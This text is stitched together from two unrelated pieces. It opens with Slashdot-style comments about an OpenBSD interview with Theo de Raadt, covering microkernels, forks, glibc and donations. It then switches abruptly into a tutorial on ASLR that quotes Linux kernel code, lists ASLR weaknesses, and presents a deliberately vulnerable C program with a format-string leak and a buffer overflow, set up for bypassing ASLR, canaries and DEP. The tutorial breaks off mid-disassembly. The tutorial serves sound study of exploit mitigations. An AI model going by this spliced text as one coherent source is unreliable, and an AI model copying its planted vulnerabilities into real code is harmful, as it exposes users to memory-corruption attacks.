I've got an answer for this one! Well, sort of - I don't know why people are cheap. But I do know why people who AREN'T cheap still would prefer to donate to a non-profit organization. First, the constraints placed on a non-profit organization reassure some people that their donation stands some chance of being used for the purpose they think they're donating it to.
Second, if I have $10,000 I don't need, and want to donate it to someone, if I donate it to a charitable organization in the U.S., I can donate $12,000 for the same eventual out-of-pocket as if I donated $10,000 to an organization without charitable tax-exempt status. So the second organization would have to convince me that it will make better use of my money. Sure, most people don't explicitly view it that way, but when you look at the bottom line, there's not much difference between "if I give $500 to them, I get $100 back; if I give $500 to THEM, I get nothing" and "if I give $400 to them, I could actually give $500; if I give $400 to THEM, I can only give $400."

Re:filtering by FreeBSD/NetBSD (Score:2)

If you're scared of spamming and mail bombing, stay off the internet. Frankly, any good admin worth his salt would want to see how his boxes stand up under such a load, rather than be a big weenie and run away from a fight. So what I read is: Theo threatened to mailbomb, and didn't? Link to mail thread [netbsd.org] Just bizarre. Frankly there are a lot of high horses out there. OpenBSD is a good system. I'm not a big fan of BSD, but I encourage people to use OpenBSD just to try it and learn. (I did run it for a while on a sparc and it ran better than linux on that box.) Every OS has its place. OpenBSD is just Canadian and has balls (big encrypted balls). It's neat and it ships with things like ssh out of the box. I'm just very depressed lately (lately being a long time now) by hate-mailers and whiners on slashdot--- the people who write the software (free) that we use (quality) often don't get the respect they deserve. Anyway, that's my 2 cents.

Using your own numbers. (Score:2)

Bob Bruce of BSDi (previously of Walnut Creek) says FreeBSD's user base is 20% of the size of the Linux market. If you consider FreeBSD and Linux all fighting for the same slice of the pie, how many of the 180+ Linux distros have 20% marketshare?
Let's see... given all distros have the same kernel, they are all alike. So the average market share for any Linux distro is 0.55%, or 1011 users per distro. So FreeBSD has a far greater marketshare and number of users than the average Linux distro for the Open Source OS market. 36400*5=182000 total Linux users. counter.li.org [slashdot.org] says there are 162,680 Linux users. As you can see, the numbers presented as to why BSD is doomed are similar. It looks like the individual Linux companies, none of them strong enough to get any useful market share (1,011 users per distro), will doom the Open Source OS market to appear as a failure. As you can see, Linux is very, VERY sick and its long-term survival is very dim. And the stock prices of Linux companies show how doomed Linux is. If Linux survives, it will be among OS hobbyists and die-hard users who read With the release of Apple's Mac OS X - based on BSD and selling 2 million units a quarter, you can see how just one quarter of Apple sales will outsell *ALL* of the Linux users. (So there. Nyah!)

Re:But he doesn't follow his own advice (Score:2)

- QNX [qnx.com]
- VSTa [vsta.org]
----- "People who bite the hand that feeds them usually lick the boot that kicks them"

Re:No plans for SMP... (Score:2)

this certainly verified that point. can anyone think of other features that open source projects need that aren't done because they're not interesting? -Jon

Re:Do it right! (Score:2)

Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way? but what if? it's a lot of work, and not considered the most interesting thing to our developers. Sorry shit. what if it's not interesting to fix a big fat gaping hole? what if it's too much work, and "just not interesting!" gasp.
-Jon

Re:But he doesn't follow his own advice (Score:2)

While this is a very subjective topic, many people would argue that the Mach microkernel found in Next/Open Step is pretty good, and IIRC, the BeOS is a pretty good microkernel, too. Heh, I bet even l33t j03 [slashdot.org] would say Windows 2000 is a great microkernel!

Bashing Theo (Score:2)

Re:Missing the point on floppy-based routers? (Score:2)

In my eyes a floppy distribution includes features such as: * Write protection * VERY VERY MINIMAL install (smaller than OpenBSD's 60-70 MB minimal install) NOT that it sits on a floppy. I usually make a good LRP disk and make a bootable CD. Reburn every month with updated NAT forwardings and a new password. If someone DID hack into that box, there is no ftp/ssh/telnet on there for them to connect out! There is no way to write to a CD-R in a regular CD-ROM drive.

Know your interfaces? Bah! (Score:2)

But I have been compiling against the GNU C library a lot, and I loathe it for the most part. Examples? Examples. - from man strcpy: If the destination string of a strcpy() is not large enough (that is, if the programmer was stupid/lazy, and failed to check the size before copying) then anything might happen. Overflowing fixed length strings is a favourite cracker technique. - from man strcat: The strcat() function appends the src string to the dest string overwriting the `\0' character at the end of dest, and then adds a terminating `\0' character. The strings may not overlap, and the dest string must have enough space for the result. Yes, I especially loathe the string functions. If you feed them too-small buffers, or NULL pointers, glibc just plain old crashes. In my not so humble opinion, it is glibc's _responsibility_ as a C library to be flexible enough to allocate that stupid little buffer itself, or at least not to crash with segmentation violations!
If I do the same things with GTK+'s glib, my program fails with a nice message, like "assert string != NULL failed" -- but even more often, it just allocates that stupid little buffer! Now before you're going to say "look, if you want someone to hold your hand, go play with Java, not with C", please realize that all this could just simply _work_ in C with a few checks, and that not a single line of code would need auditing for these "vulnerabilities" anymore, if only this check had been made in glibc! That's the use of programming libraries, right? Not having to do something again and again, so that you work with well-known interfaces and do not run the risk of making many mistakes. You know, even Richard Stallman, author of this particular C library, agrees with me upon this point: - from info libc: It's fairly common for beginning C programmers to "reinvent the wheel" by duplicating this functionality in their own code, but it pays to become familiar with the library functions and to make use of them, since this offers benefits in maintenance, efficiency, and portability. Now the only sad thing about this quote is that it actually comes from the part "Strings and Array Utilities" of info libc, about which _I_ would like to say "It's fairly common for beginning C programmers to become familiar with the library functions and make use of them, but it pays to duplicate this functionality in your own code" -- if you catch my drift. Which makes me wonder how secure OpenBSD (and *BSD) is at the libc level, that is, how flexibly and carefully does it work with its input. [Hmm, and while I'm at it, is char++ endian-independent? Just wondering.]

Re:Before flaming Theo ... (Score:2)

I have actually met Theo in person and he is NOT egotistical or arrogant in the slightest. He's quiet, reserved, and interesting. I think he's just impatient with a world where software quality standards aren't as high a priority as they should be.
Re:Missing the point on floppy-based routers? (Score:2)

It would also have to provide a nice (albeit simple and text-based) configuration tool or something similar to set up said box. Of course, it could provide more than just NAT and firewall. I don't care. But I do care about keeping the install minimal. That is why I mentioned FreeSco, a floppy-based product. Unfortunately, it seemed as though I was implying that I was only interested in firewall-on-a-floppy. Oh well.

Re:No plans for SMP... (Score:2)

You ignore a couple things in this though. First, I can't implement it myself; I am a mediocre programmer at best, and would not know where to begin. The poster was commenting on the commercial viability of Open Source. Let's say my dad needs an OS for his business, and somehow you managed to dodge all the issues of actually teaching him Unix, and got him to accept that there was some valid reason he should learn all this new stuff rather than just pointing and drooling through Windows. So, Dad, here you go: OpenBSD, the most secure OS in the world -- of course if you want to use it on your dual CPU server, you are going to have to learn how to rewrite the kernel for SMP support. Dad would laugh all the way to CompUSA. Commercial success is going to require more than "just develop it yourself"; if people were willing and able to do that, Windows would not have a 90% market share.

Re:But he doesn't follow his own advice (Score:3)

You wrote:

In his first response, Theo wrote: They don't care about good software, only about "good enough" software.

Which I would paraphrase as software that doesn't make security a design goal.

In his other response, Theo wrote: As well, I don't think it makes any difference, as long as a system does what it is supposed to do.

Which I would paraphrase as: software should achieve its design goals, like security, no matter how it's implemented. There is no contradiction in those two statements.
Ego based contradictions (Score:3)

As well, I don't think it makes any difference, as long as a system does what it is supposed to do.

This is a fairly asinine thing to say, especially since the second post had a very good point (micro vs monolithic kernels). My opinion of Theo is fairly low after this. Instead of responding with a mea culpa (yes, a microkernel is better; of course it's better to keep privileged code to a minimum, but it's also difficult to totally re-engineer a kernel, especially when it works) we get mindless thrashing about microkernels.. (an operating system based on 70's technology dissing ideas from the 80's as obsolete? Kind of ironic..)

Lighten up! (Score:2)

In a word: He has no obligation to you, no matter how hard you try to rationalize that he does. He isn't charging you for software, he isn't forcing you to listen, he isn't infringing on any aspect of your reality... unless you let him.

But he doesn't follow his own advice (Score:3)

In the answer to the first question Theo goes into detail about why software should be good, not just "good enough". However, in answer to the 5th question, "Kernel Design", he contradicts his own previous argument by saying "I dont think it makes any difference, as long as the system does what it is supposed to".

Theo, throughout your responses, you have personally insulted the intelligence of the people who ask you questions. You have insulted the intelligence of the people who either use, plan to try, or know more than most of the dawdling masses about your distribution. What I don't understand is why. If you could answer that, I would appreciate it. And if you could answer it without the typical belittling that is ever present throughout the answers to the questions asked before, I would appreciate it even more.
Sincerely, CyberKnet
---

Theo and Microkernels (Score:2)

Setting aside discussions about NT or OpenVMS, wouldn't a design like the HURD (I'm not saying MKs are better or that I like them more than monolithic systems) at least be a reasonable approach to more system security? If I understand correctly, HURD and probably other microkernels can run a lot more stuff in userland, and that could at least be an advantage when you try to build a very secure system. If Theo is really posting on

Charitable Donations (Score:2)

From a different point of view (for Canadians, at least), you can look at the tax break for "charitable donations" as a way of directing government money to the organizations you would like supported. From my point of view, a $100 charitable donation is really only an ~$80 donation from me, plus ~$20 of the government's money that I want directed to organizations I feel are important. That's not to say that (non|not-for)-profit is the way to go for OpenBSD, but it may convert a few more anti-charitable-donations people to support organizations they feel are important. I only give to those organizations that I feel are important (whether they get me a tax deduction or not), since you don't actually get more out of the tax deduction than you put into the donation.

andrew

Working with microkernels (Score:5)

Forks are Good! (Score:5)

I think he is totally correct with this point. The point of a code fork is that you end up with two variants, only one of which, in the long term, will survive (usually). It leads to a sort of Darwinian survival of the fittest, and improves the overall code base in the long term as well as giving people options - they can mould their distro to their needs. I have often wondered why the Linux people are so scared of code forks also - could it be because they look back at the Unix wars of the eighties and shudder?
This would suggest that the BSD'ers have not inherited the UNIX philosophy to the same degree as the Linux community - that may give them more freedom. I am not suggesting that forks be encouraged, though, rather that people stop whining when they occur, and recognise them as an opportunity. Perhaps forks will not be a good thing for Linux in ten years or so, but given that it is presently a sort of 'primordial ooze', and very creative, I do not think it is a bad thing for the moment.

KTB: Lover, Poet, Artiste, Aesthete, Programmer.

Re:But he doesn't follow his own advice (Score:2)

I use OpenBSD personally. It makes a great firewall. But other than preventing external access to internal services, there's not much I can do to prevent daemons I run from being compromised if they haven't been through the vigorous code audit that the rest of OpenBSD has been through. I asked my question as an OpenBSD user, not as a Linux user. I wouldn't dream of using Linux as a firewall when OpenBSD is open to me. But at the same time, I'm painfully aware that OpenBSD only goes so far. I do want to see similar auditing efforts applied to the third party servers, in particular, as are currently applied to OpenBSD. If I had time, I'd start the ball rolling myself...
--

Re:But he doesn't follow his own advice (Score:2)

I'd like you to point at anything I've said that even remotely resembles that point of view. Ironically, that point of view is actually relatively close to the Unix modus operandi: tools like BIND, sendmail, etc, which were generated outside of the OpenBSD group, have been subjected to the same standards of auditing as the rest of the operating system. Perhaps you'd like to review your history of Unix - Linux wasn't the first Unix, and it was Unix, not Linux, that set in place most of the modes of operation we see in Unixen today, from source-available software to blurring the line between the OS and third party tools when it comes to system software.
And I guess BSD's source is the responsibility of the University of B. to get sorted out. What tosh.

The OpenBSD team currently maintains a ports tree. It would be nice to have a separate tree, or a categorisation within that tree, of ports that have gone through the same rigorous standards of auditing that the source code to the operating system has done, for some critical tools. Asking the OpenBSD team if they could organise this, as they already organise a ports tree, is perfectly reasonable. Nobody other than you seems to regard this as an unfair request. Given Theo's reputation, I wouldn't have expected a non-candid answer if he had felt the question was unfair. If he feels the question is unreasonable or silly, he certainly isn't showing it.

The reason why people like me use OpenBSD is because it's been through that audit. When we install critical third party tools like INN, we know that the hard work of the OpenBSD developers to make it easy to secure a box has just been compromised. If you think we should just wait on the original third-party developers to announce that their programs have been "secured", you don't have a clue why we're running OpenBSD in the first place.
--

Where the money goes (Score:3)

I find the ideas that I get from beer are generally along the lines of "I think I'll have another beer". TdR is obviously made of sterner stuff than I. Or it could just be that Canada has the 2nd worst beer in the world (after the US).

Re:Mr.Sparkler (Score:3)
Preface

Hey there! I'm finally ready to present you the third installment of the series on exploit mitigation techniques. Today I want to talk about Address Space Layout Randomization, or ASLR in short. Format-wise the article will be structured the following way:

- Introduction to the technique
- Current implementation details
- Weaknesses
- PoC on how to bypass ASLR
- Conclusion

Disclaimer: The following is the result of a self study and might contain faulty information. If you find any, let me know. Thanks!

Requirements

- A bunch of spare minutes
- A basic understanding of what causes memory corruptions/information leaks
- The will to ask or look up unknown terms yourself
- ASM/C knowledge
- x64 exploitation basics
- return oriented programming basics
- knowledge from my previous 2 installments

Address Space Layout Randomization

Basic Design

With DEP and canaries in place, adversaries could not easily execute arbitrarily inserted code in memory anymore. Memory pages where buffer contents reside are marked non-executable, and the canary value prevents a simple overwrite of any return statement within a function. A problem that was still present and exploited was that executed processes had a static address mapping. That made it easy to find addresses of library functions or the run binary itself in memory, ultimately leading to a successful arc injection attack without much effort.

As a result, address space layout randomization (ASLR) emerged to bring another security parameter to the table and deny adversaries easily guessable memory locations. The idea is to place objects randomly in the virtual address space, leaving an attacker with a non-trivial problem to solve: the ability to execute placed malicious code at will. A very tl;dr version of ASLR would be that a random offset value is added to the base address during process creation to independently change all three areas of a process's address space, consisting of the executable, mapped and stack areas.
In short, the most exploited areas (the stack, the heap and the libraries) are mapped randomly in memory to prevent abuse. Linux offers three different ASLR modes, which are displayed below. ASLR can be configured by setting a value in /proc/sys/kernel/randomize_va_space. Three flags are available:

0 – No randomization. Everything is static.
1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized.
2 – Full randomization. In addition to the elements listed in the previous point, memory managed through brk() is also randomized.

Note: "VDSO" (virtual dynamic shared object) is a small shared library that the kernel automatically maps into the address space of all user-space applications.

Note 2: mmap() creates a new mapping in the virtual address space of the calling process.

Note 3: brk() and sbrk() change the location of the program break, which defines the end of the process's data segment.

Beyond that, Linux offers position independent executable (PIE) binaries, which harden ASLR even more. PIE is an additional address space randomization technique that compiles and links executables to be fully position independent. The result is that binaries compiled that way have their code segment, their global offset table (GOT) and their procedure linkage table (PLT) placed at random locations within virtual memory each time the application is executed as well, leaving no more static locations. Here you can see a simple overview of how a process can behave in memory after three successive executions.

PIE detour

Let's talk about total position independence for a moment! To make a PIE binary work correctly, we have to consider that there needs to be a way for the loader to resolve symbols at runtime. As the address of the symbol in memory is not a part of the main binary anymore, the loader adds a level of indirection in the procedure linkage table (PLT).
Instead of calling, let's say, puts() directly, the .plt section of the binary contains a special entry that points to the loader. The loader then has to resolve the actual address of the function. Once it has done that, it updates an entry in the global offset table (GOT). Subsequent calls to the same routine are made by jumps from the GOT entry.

Trivia: The Linux command line program file detects PIE files as dynamic shared objects (DSO) instead of the usual ELF executable type.

PIE must be viewed as an addition to ASLR, since it would not do any good if there was no ASLR in the first place. That said, since a PIE binary and all of its dependencies are loaded into random locations within virtual memory each time the application is executed, return oriented programming (ROP) attacks are much more difficult to execute reliably.

Okay, back to the main topic about ASLR! Linux based operating systems have had a default ASLR implementation since kernel version 2.6.12, which was released in 2005, but got a set of patches from the PaX project later on to increase security. Already in 2001 PaX had published the first design and implementation of ASLR. Only years later, in 2014, with the release of kernel version 3.14, came the possibility to enable kernel address space layout randomization (kASLR), which has the same goal as ASLR, only with the idea in mind to randomize the kernel code location in memory when the system boots. Since kernel version 4.12 kASLR is enabled by default.

The effectiveness of kASLR has been questioned quite a few times already and a variety of drawbacks are publicly known as of today. Nonetheless it adds further hardening to the system and should not be dismissed that easily. I have added some references at the end for anyone interested in kASLR exploitation :) .
Side note: Windows machines, on the other hand, have had ASLR and kASLR enabled by default since the launch of Windows Vista in 2006 and work similarly, but due to differences in system design there are nuances that cannot be covered in this paper; they can be looked up in a detailed analysis issued by the CERT Institute.

This makes clear that (k)ASLR and PIE rely solely on keeping the altered memory layout secret to be effective.

ASLR implementation - Diving into the Linux kernel

What would a research article look like if we didn't dig into the implementations ;) . The kernel is huge and truly a work of geniuses; as a result I can only scratch the surface of the implementations in this article. This lets us focus on the relevant parts and keep the article a reasonable length. Again remember, this will all be Linux specific, so please keep that in mind :) .

Note: We will mostly take a look at the current x86 implementation. Comparing the following to the other implementations is another topic!

Randomizing a memory address

So first of all, how does the system get a randomized memory address in the available/valid address range? Luckily the kernel code is open source and (mostly :D ) documented! Let's take a look at the /drivers/char/random.c kernel file that handles exactly our needs:

/**
 * randomize_page - Generate a random, page aligned address
 * @start:	The smallest acceptable address the caller will take.
 * @range:	The size of the area, starting at @start, within which the
 *		random address must fall.
 *
 * If @start + @range would overflow, @range is capped.
 *
 * NOTE: Historical use of randomize_range, which this replaces, presumed that
 * @start was already page aligned. We now align it regardless.
 *
 * Return: A page aligned address within [start, start + range). On error,
 * @start is returned.
 */
unsigned long randomize_page(unsigned long start, unsigned long range)
{
	if (!PAGE_ALIGNED(start)) {
		range -= PAGE_ALIGN(start) - start;
		start = PAGE_ALIGN(start);
	}

	if (start > ULONG_MAX - range)
		range = ULONG_MAX - start;

	range >>= PAGE_SHIFT;

	if (range == 0)
		return start;

	return start + (get_random_long() % range << PAGE_SHIFT);
}

Essentially what happens here is that in order to generate a random address, randomize_page() takes two arguments: a start address and a range. After some initial page alignment magic, what it ultimately comes down to is that it calls get_random_long() and applies a modulo to get a page aligned address at or above the supplied 'start' address within the offered 'range'.

ELF binary loading

If the kernel is instructed to load an ELF binary, a routine called load_elf_binary() is invoked. It is located in /fs/binfmt_elf.c. Here a multitude of things happen. Let's take a quick look at the parts which are responsible for the initialization of memory pointers, like the code, data and stack sections.

static int load_elf_binary(struct linux_binprm *bprm)
{
	[...]
	if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
		current->flags |= PF_RANDOMIZE;
	[...]
	/* Do this so that we can load the interpreter, if need be. We will
	   change some of these later */
	retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
				 executable_stack);
	[...]
	/* N.B. passed_fileno might not be initialized?
	 */
	current->mm->end_code = end_code;
	current->mm->start_code = start_code;
	current->mm->start_data = start_data;
	current->mm->end_data = end_data;
	current->mm->start_stack = bprm->p;

	if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
		current->mm->brk = current->mm->start_brk =
			arch_randomize_brk(current->mm);
#ifdef compat_brk_randomized
		current->brk_randomized = 1;

We can see that if the randomize_va_space variable is higher than 1 and the PF_RANDOMIZE flag is set, the base address of brk() is randomized with the arch_randomize_brk() function. Furthermore, the top of the stack gets some randomization treatment as well!

brk() randomization

Recall: brk() changes the location of the program break, which defines the end of the process's data segment. The x86 implementation of the arch_randomize_brk() function is located in /arch/x86/kernel/process.c:

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
	return randomize_page(mm->brk, 0x02000000);
}

It randomizes the given address space by passing the current brk address together with a range argument of 0x02000000 to the randomize_page() routine discussed earlier!

Stack randomization

The stack randomization is started in /fs/binfmt_elf.c as well, in particular in the load_elf_binary() routine we talked about above!

static int load_elf_binary(struct linux_binprm *bprm)
{
	[...]
	/* Do this so that we can load the interpreter, if need be. We will
	   change some of these later */
	retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
				 executable_stack);
	[...]

In the end there are two components we have to take a look at here: first setup_arg_pages() and then randomize_stack_top(). Let's start with the latter, since it's needed as a function argument for setup_arg_pages():

[...]
#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))	/* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
	unsigned long random_variable = 0;

	if (current->flags & PF_RANDOMIZE) {
		random_variable = get_random_long();
		random_variable &= STACK_RND_MASK;
		random_variable <<= PAGE_SHIFT;
	}
#ifdef CONFIG_STACK_GROWSUP
	return PAGE_ALIGN(stack_top) + random_variable;
#else
	return PAGE_ALIGN(stack_top) - random_variable;
#endif
[...]
}

It takes the top of the stack as an address and returns a page aligned version of that address +/- some random variable. This random variable is obtained by calling get_random_long() and then narrowing it down: a bitwise AND assignment (&=) with the defined STACK_RND_MASK, followed by a left shift assignment (<<=) by PAGE_SHIFT.

Okay, that was not all for the stack, as we outlined just earlier. The actual stack randomization takes place in /fs/exec.c, more specifically in the setup_arg_pages() routine:

[...]
/*
 * Finalizes the stack vm_area_struct. The flags and permissions are updated,
 * the stack is optionally relocated, and some extra space is added.
 */
int setup_arg_pages(struct linux_binprm *bprm,
		    unsigned long stack_top,
		    int executable_stack)
[...]
#ifdef CONFIG_STACK_GROWSUP
	/* Limit stack size */
	stack_base = rlimit_max(RLIMIT_STACK);
	if (stack_base > STACK_SIZE_MAX)
		stack_base = STACK_SIZE_MAX;

	/* Add space for stack randomization. */
	stack_base += (STACK_RND_MASK << PAGE_SHIFT);

	/* Make sure we didn't let the argument array grow too large. */
	if (vma->vm_end - vma->vm_start > stack_base)
		return -ENOMEM;

	stack_base = PAGE_ALIGN(stack_top - stack_base);

	stack_shift = vma->vm_start - stack_base;
	mm->arg_start = bprm->p - stack_shift;
	bprm->p = vma->vm_end - stack_shift;
#else
	[...]
	mm->arg_start = bprm->p;
#endif
[...]
If the stack segment does not grow upwards, the kernel will use arch_align_stack() on the stack top address, which was passed as an argument to the function we are looking at. It will then page align the returned value and continue further stack setup. The alignment procedure can again be found in /arch/x86/kernel/process.c:

unsigned long arch_align_stack(unsigned long sp)
{
	if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
		sp -= get_random_int() % 8192;
	return sp & ~0xf;
}

If the currently executed task has no ADDR_NO_RANDOMIZE flag set, and furthermore randomize_va_space holds a value other than 0, the get_random_int() function is invoked to perform the stack randomization. This happens in the form of retrieving a random int value and following up with a modulo (%) operation by 8192. After decrementing the stack pointer (sp) by that random number in case of an ASLR supported task, the mentioned alignment takes place: on the x86 architecture the pointer is aligned by masking it with ~0xf (i.e. 0xfffffff0 on 32 bit).

mmap() randomization

Recall: mmap() creates a new mapping in the virtual address space of the calling process. Among its arguments are a start address for the new mapping and the length of the mapping. After performing some essential tests to avoid collisions with the randomized virtual address space of the stack, the randomization routine for mmap() is started. We can find the essential pieces in /arch/x86/mm/mmap.c:

[...]
static unsigned long mmap_base(unsigned long rnd, unsigned long task_size)
{
	unsigned long gap = rlimit(RLIMIT_STACK);
	unsigned long pad = stack_maxrandom_size(task_size) + stack_guard_gap;
	unsigned long gap_min, gap_max;

	/* Values close to RLIM_INFINITY can overflow. */
	if (gap + pad > gap)
		gap += pad;

	/*
	 * Top of mmap area (just below the process stack).
	 * Leave an at least ~128 MB hole with possible stack randomization.
	 */
	gap_min = SIZE_128M;
	gap_max = (task_size / 6) * 5;

	if (gap < gap_min)
		gap = gap_min;
	else if (gap > gap_max)
		gap = gap_max;

	return PAGE_ALIGN(task_size - gap - rnd);
[...]
}

First, the maximum randomized stack address is calculated via stack_maxrandom_size(). We can see that the routine itself is already called with an unsigned long rnd parameter, which is used as a factor when returning the page aligned memory area. The rnd variable is calculated and retrieved beforehand by the arch_rnd() routine, which looks like this:

static unsigned long arch_rnd(unsigned int rndbits)
{
	if (!(current->flags & PF_RANDOMIZE))
		return 0;
	return (get_random_long() & ((1UL << rndbits) - 1)) << PAGE_SHIFT;
}

After checking whether randomization shall take place at all, the routine performs a few bit operations. The rndbits part depends on whether we have a 32-bit or 64-bit application.

Note: 1UL represents an unsigned long int with a value of 1, represented at the bit level as: 00000000000000000000000000000001

In the end we take the value 1 as an unsigned long int, left shift it by the rndbits value and subtract 1, which yields a mask of rndbits one-bits. Next, an AND operation at the binary level with the random value takes place. The result then gets left shifted by the value residing in PAGE_SHIFT.

So much for a brief overview of the Linux kernel internals for now. Since the kernel is an ever evolving structure, things might be different in the near future, but the basic routines will most likely stay the same. Let's continue, since we still have a lot more to talk about! Next up is the talk about known ASLR limitations.

Flashback: Data Execution Prevention

Recall: mprotect() changes the protection of the calling process's memory page(s) containing any part of the given address range.

Remember my first article about data execution prevention and non executable stacks :) ?
When skimming through the kernel code I found the code snippet responsible for making the stack (not) executable. It was right below the stack randomization part in /fs/exec.c:

[...]
	vm_flags = VM_STACK_FLAGS;

	/*
	 * Adjust stack execute permissions; explicitly enable for
	 * EXSTACK_ENABLE_X, disable for EXSTACK_DISABLE_X and leave alone
	 * (arch default) otherwise.
	 */
	if (unlikely(executable_stack == EXSTACK_ENABLE_X))
		vm_flags |= VM_EXEC;
	else if (executable_stack == EXSTACK_DISABLE_X)
		vm_flags &= ~VM_EXEC;

	vm_flags |= mm->def_flags;
	vm_flags |= VM_STACK_INCOMPLETE_SETUP;

	ret = mprotect_fixup(vma, &prev, vma->vm_start, vma->vm_end,
			     vm_flags);
[...]

For those of you who are still interested: it uses a modified mprotect() routine, which can be found in /mm/mprotect.c.

Limitations

As good as ASLR sounds on paper, it has multiple design flaws, especially on 32 bit systems. Moreover, multiple ways around ASLR have been found, which enable adversaries to still exploit applications with only a moderate increase in workload during the exploit building phase.

One of the most critical constraints on 32 bit systems is the fragmentation problem, which limits the security design a lot. Objects are randomly mapped in memory, causing "chunks" of free memory in between mapped objects in the address space, which can also be seen in the ASLR graphics at the beginning. Eventually no memory chunk big enough to hold a new process can be found anymore. This is less of a problem on 64 bit systems due to the increased size of the virtual memory address space.

ASLR relies on the randomness applied to objects mapped in memory to be effective. Nevertheless, a relative distance between objects in memory is maintained to give growable objects like the stack or heap more freedom, while avoiding fragmentation. This method introduces a major flaw due to too low entropy values. On average 16 bits of entropy are present on 32 bit systems, which can be brute forced within minutes at most on current systems.
64 bit systems have around 40 bits available for randomization, of which only around 28 bits can effectively be used for entropy purposes, making them somewhat more secure. This only matters as long as one cannot guess some bits through information leaks or similar tactics. Furthermore, it was observed that the random generator used by ASLR does not produce a truly uniform mapping for all libraries on either architecture, so focusing on the more likely addresses to hold mapped objects decreases the cost of a brute force attack even further.

Last but not least, the fact that libraries are mapped next to each other in memory can be used for correlation attacks, since knowing one library address leaks the positions of all surrounding ones as well. That enabled an exploit tactic called offset2lib, where a buffer overflow is used to de-randomize an application's address space and fully abuse this. Besides the aforementioned facts, already known return-to-known-code attacks like ret2libc or return oriented programming work as well as ever if one can find the right addresses to use.

Additionally, for kASLR you have to note that gaining any pointer which provides information about the kernel's allocation in memory can be used to break this technique, since the kernel cannot change its distribution in memory throughout its operating time. This means that until the next system reboot a new randomization of kernel code in memory will not and, more importantly, cannot be performed! This fact makes kASLR weaker than its big brother ASLR, since the latter randomizes for every newly spawned process.

Note: binaries compiled without the PIE option are vulnerable even with fully enabled ASLR present. This is the case since an attacker can leverage the .text, .plt and .got segments within the executable. That said, valid attack types in this case are return2PLT/GOT or simply ROP!
Defeating ASLR, Stack Canaries and DEP as well as bypassing FULL RELRO on x64

Since ASLR does not bring anything new or fancy to the table and just randomizes the process address space of a given binary, I thought we could jump right into x64 exploitation as well.

The vulnerable binary

So let's get right into it: the vulnerable program did not change much from last time. It was already built with being exploited under ASLR in mind ;) Here is the code again:

#include <stdio.h>
#include <string.h>

#define STDIN 0

void itIsJustASmallLeakSir() {
	char buf[512];
	scanf("%s", buf);
	printf(buf);
}

void trustMeIAmAnEngineer() {
	char buf[1024];
	read(STDIN, buf, 2048);
}

int main(int argc, char* argv[]) {
	printf("Welcome to how 2 not write Code 101");
	setbuf(stdout, NULL);
	printf("$> ");
	itIsJustASmallLeakSir();
	printf("\n");
	printf("$> ");
	trustMeIAmAnEngineer();
	printf("\nI reached the end!\n");
	return 0;
}

There are two obvious vulnerabilities at hand. One is a format string vulnerability in the itIsJustASmallLeakSir() function: we have full control of the buffer contents and our input is printed without any checks. The other is a buffer overflow in the trustMeIAmAnEngineer() function: here we read 2048 bytes into a buffer which can hold just half of that.

Let's compile it with gcc -o vuln_x64 vuln.c -Wl,-z,relro,-z,now. Also let's enable full ASLR:

echo 2 > /proc/sys/kernel/randomize_va_space

This results in a binary with the following exploit mitigations in place:

$ checksec vuln_x64
[*] '/home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64'
    Arch:     amd64-64-little
    RELRO:    FULL RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The assembly did not change too much either, obviously.
For the sake of completeness, let's take a look again. main():

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400813 <+0>:	push   rbp
   0x0000000000400814 <+1>:	mov    rbp,rsp
   0x0000000000400817 <+4>:	sub    rsp,0x10
   0x000000000040081b <+8>:	mov    DWORD PTR [rbp-0x4],edi
   0x000000000040081e <+11>:	mov    QWORD PTR [rbp-0x10],rsi
   0x0000000000400822 <+15>:	mov    edi,0x400930                  ; string to be printed
   0x0000000000400827 <+20>:	mov    eax,0x0
   0x000000000040082c <+25>:	call   0x400620 <printf@plt>         ; welcome message is printed
   0x0000000000400831 <+30>:	mov    rax,QWORD PTR [rip+0x200830]  # 0x601068 <stdout@@GLIBC_2.2.5>
   0x0000000000400838 <+37>:	mov    esi,0x0
   0x000000000040083d <+42>:	mov    rdi,rax
   0x0000000000400840 <+45>:	call   0x400610 <setbuf@plt>
   0x0000000000400845 <+50>:	mov    edi,0x400954                  ; string to be printed
   0x000000000040084a <+55>:	mov    eax,0x0
   0x000000000040084f <+60>:	call   0x400620 <printf@plt>         ; "$> "
   0x0000000000400854 <+65>:	mov    eax,0x0
   0x0000000000400859 <+70>:	call   0x400766 <itIsJustASmallLeakSir>  ; function call
   0x000000000040085e <+75>:	mov    edi,0xa                       ; "\n"
   0x0000000000400863 <+80>:	call   0x4005e0 <putchar@plt>        ; "\n" is printed
   0x0000000000400868 <+85>:	mov    edi,0x400954                  ; string to be printed
   0x000000000040086d <+90>:	mov    eax,0x0
   0x0000000000400872 <+95>:	call   0x400620 <printf@plt>         ; "$> "
   0x0000000000400877 <+100>:	mov    eax,0x0
   0x000000000040087c <+105>:	call   0x4007c4 <trustMeIAmAnEngineer>   ; function call
   0x0000000000400881 <+110>:	mov    edi,0x400958                  ; string to be printed
   0x0000000000400886 <+115>:	call   0x4005f0 <puts@plt>           ; "\nI reached the end!\n"
   0x000000000040088b <+120>:	mov    eax,0x0
   0x0000000000400890 <+125>:	leave
   0x0000000000400891 <+126>:	ret
End of assembler dump.

itIsJustASmallLeakSir() next.
gdb-peda$ disassemble itIsJustASmallLeakSir
Dump of assembler code for function itIsJustASmallLeakSir:
   0x0000000000400766 <+0>:  push   rbp
   0x0000000000400767 <+1>:  mov    rbp,rsp
   0x000000000040076a <+4>:  sub    rsp,0x210
   0x0000000000400771 <+11>: mov    rax,QWORD PTR fs:0x28             ; stack canary right here
   0x000000000040077a <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000040077e <+24>: xor    eax,eax
